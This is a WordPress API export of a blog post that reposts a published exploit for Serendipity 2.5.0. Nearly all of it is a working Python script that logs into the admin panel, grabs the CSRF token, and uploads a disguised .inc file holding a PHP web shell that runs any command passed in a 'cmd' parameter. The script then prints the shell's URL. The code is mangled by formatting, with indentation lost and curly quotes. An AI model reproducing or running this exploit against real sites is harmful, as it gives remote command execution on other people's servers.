{"id":57234,"date":"2024-06-03T18:49:51","date_gmt":"2024-06-03T15:49:51","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178890\/serendipity250-exec.txt"},"modified":"2024-06-03T18:49:51","modified_gmt":"2024-06-03T15:49:51","slug":"serendipity-2-5-0-remote-code-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/serendipity-2-5-0-remote-code-execution\/","title":{"rendered":"Serendipity 2.5.0 Remote Code Execution"},"content":{"rendered":"

# Exploit Title: Serendipity 2.5.0 – Remote Code Execution (RCE)
# Discovered by: Ahmet \u00dcmit BAYRAM
# Discovered Date: 26.04.2024
# Vendor Homepage: https:\/\/docs.s9y.org\/
# Software Link:https:\/\/www.s9y.org\/latest
# Tested Version: v2.5.0 (latest)
# Tested on: MacOS<\/p>\n

import requests
import time
import random
import string
from bs4 import BeautifulSoup<\/p>\n

def generate_filename(extension=”.inc”):
return ”.join(random.choices(string.ascii_letters + string.digits, k=5)) +
extension<\/p>\n

def get_csrf_token(response):
soup = BeautifulSoup(response.text, ‘html.parser’)
token = soup.find(‘input’, {‘name’: ‘serendipity[token]’})
return token[‘value’] if token else None<\/p>\n

def login(base_url, username, password):
print(“Logging in…”)
time.sleep(2)
session = requests.Session()
login_page = session.get(f”{base_url}\/serendipity_admin.php”)
token = get_csrf_token(login_page)
data = {
“serendipity[action]”: “admin”,
“serendipity[user]”: username,
“serendipity[pass]”: password,
“submit”: “Login”,
“serendipity[token]”: token
}
headers = {
“Content-Type”: “application\/x-www-form-urlencoded”,
“Referer”: f”{base_url}\/serendipity_admin.php”
}
response = session.post(f”{base_url}\/serendipity_admin.php”, data=data,
headers=headers)
if “Add media” in response.text:
print(“Login Successful!”)
time.sleep(2)
return session
else:
print(“Login Failed!”)
return None<\/p>\n

def upload_file(session, base_url, filename, token):
print(“Shell Preparing…”)
time.sleep(2)
boundary = “—————————395233558031804950903737832368”
headers = {
“Content-Type”: f”multipart\/form-data; boundary={boundary}”,
“Referer”: f”{base_url}
\/serendipity_admin.php?serendipity[adminModule]=media”
}
payload = (
f”–{boundary}\\r\\n”
f”Content-Disposition: form-data; name=\\”serendipity[token]\\”\\r\\n\\r\\n”
f”{token}\\r\\n”
f”–{boundary}\\r\\n”
f”Content-Disposition: form-data; name=\\”serendipity[action]\\”\\r\\n\\r\\n”
f”admin\\r\\n”
f”–{boundary}\\r\\n”
f”Content-Disposition: form-data; name=\\”serendipity[adminModule]\\”\\r\\n\\r\\n”
f”media\\r\\n”
f”–{boundary}\\r\\n”
f”Content-Disposition: form-data; name=\\”serendipity[adminAction]\\”\\r\\n\\r\\n”
f”add\\r\\n”
f”–{boundary}\\r\\n”
f”Content-Disposition: form-data; name=\\”serendipity[userfile][1]\\”;
filename=\\”{filename}\\”\\r\\n”
f”Content-Type: text\/html\\r\\n\\r\\n”
“<html>\\n<body>\\n<form method=\\”GET\\” name=\\”<?php echo
basename($_SERVER[‘PHP_SELF’]); ?>\\”>\\n”
“<input type=\\”TEXT\\” name=\\”cmd\\” autofocus id=\\”cmd\\” size=\\”80\\”>\\n<input
type=\\”SUBMIT\\” value=\\”Execute\\”>\\n”
“<\/form>\\n<pre>\\n<?php\\nif(isset($_GET[‘cmd’]))\\n{\\nsystem($_GET[‘cmd’]);\\n}
\\n?>\\n<\/pre>\\n<\/body>\\n<\/html>\\r\\n”
f”–{boundary}–\\r\\n”
)<\/p>\n

response = session.post(f”{base_url}
\/serendipity_admin.php?serendipity[adminModule]=media”, headers=headers,
data=payload.encode(‘utf-8’))
if f”File {filename} successfully uploaded as” in response.text:
print(f”Your shell is ready: {base_url}\/uploads\/{filename}”)
else:
print(“Exploit Failed!”)<\/p>\n

def main(base_url, username, password):
filename = generate_filename()
session = login(base_url, username, password)
if session:
token = get_csrf_token(session.get(f”{base_url}
\/serendipity_admin.php?serendipity[adminModule]=media”))
upload_file(session, base_url, filename, token)<\/p>\n

if __name__ == “__main__”:
import sys
if len(sys.argv) != 4:
print(“Usage: python script.py <siteurl> <username> <password>”)
else:
main(sys.argv[1], sys.argv[2], sys.argv[3])<\/p>\n","protected":false},"excerpt":{"rendered":"

# Exploit Title: Serendipity 2.5.0 – Remote Code Execution (RCE)# Discovered by: Ahmet \u00dcmit BAYRAM# Discovered Date: 26.04.2024# Vendor Homepage: https:\/\/docs.s9y.org\/# Software Link:https:\/\/www.s9y.org\/latest# Tested Version: v2.5.0 (latest)# Tested on: MacOS import requestsimport timeimport randomimport stringfrom bs4 import BeautifulSoup def generate_filename(extension=”.inc”):return ”.join(random.choices(string.ascii_letters + string.digits, k=5)) +extension def get_csrf_token(response):soup = BeautifulSoup(response.text, ‘html.parser’)token = soup.find(‘input’, {‘name’: ‘serendipity[token]’})return token[‘value’] …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-57234","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57234","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=57234"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/57234\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=57234"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=57234"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=57234"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}